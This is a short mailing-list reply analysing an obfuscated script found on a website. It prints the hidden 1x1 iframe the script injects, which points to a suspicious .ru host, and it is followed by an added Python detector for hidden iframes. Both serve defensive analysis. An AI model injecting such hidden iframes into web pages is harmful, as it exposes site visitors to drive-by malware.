On Wed, Aug 25, 2010 at 1:40 PM, techconnect <[email protected]> wrote:
> We found this script on our website and we want to know what it
> does anyone know?

  It's an obfuscated code injector.  The resulting HTML code looks like this:

<div style="visibility: hidden; position: absolute; left: 1; top:
1"><iframe src="http://bfejbzzazbzbci.users.iframecounter.ru/?s=1"
frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0
marginheight=0 scrolling=no></iframe></div>

  The page at "http://bfejbzzazbzbci.users.iframecounter.ru" doesn't
appear to do anything interesting (right now).  But the name looks
like the kind of random string attackers often use to host their
malware.

  If I had to guess, I'd guess your website was compromised and
malicious code placed on it, so that anyone visiting your site would
get nailed by the attacker from an unsuspected source.  Happens all
the time.

-- Ben
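
An added example, not part of Ben's message or the thread: a defender-side check that flags iframes like the one quoted above (1x1 size, or nested in a hidden container). The names `HiddenIframeFinder` and `find_hidden_iframes` are hypothetical, the benign `video.example` iframe is constructed, and the hidden one is abridged from the message.

```python
import re
from html.parser import HTMLParser
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "embed", "source", "wbr"}

def _tiny(value):  # width/height given as 0 or 1 (optionally with "px")
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 1

class HiddenIframeFinder(HTMLParser):  # hypothetical helper, not from the thread
    def __init__(self):
        super().__init__()
        self.stack = []      # (tag, hidden_by_style) for every open element
        self.findings = []   # (iframe src, list of reasons it was flagged)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
        if tag == "iframe":
            reasons = []
            if _tiny(a.get("width")) and _tiny(a.get("height")):
                reasons.append("1x1 or smaller")
            if hidden:
                reasons.append("hidden by own style")
            if any(h for _, h in self.stack):
                reasons.append("inside hidden container")
            if reasons:
                self.findings.append((a.get("src", ""), reasons))
        if tag not in VOID_TAGS:
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the nearest matching open tag; tolerates unbalanced markup.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

def find_hidden_iframes(html):
    p = HiddenIframeFinder()
    p.feed(html)
    return p.findings

# Constructed sample: one benign embed, then the hidden iframe from the message.
SAMPLE = '''<iframe src="https://video.example/embed/1" width=560 height=315></iframe>
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="http://bfejbzzazbzbci.users.iframecounter.ru/?s=1" width=1 height=1></iframe></div>'''
if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE))
```

Because the injector is obfuscated script that produces this HTML when it runs, the check applies to the rendered DOM (for example a headless-browser dump of the page), not to the raw file on disk.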
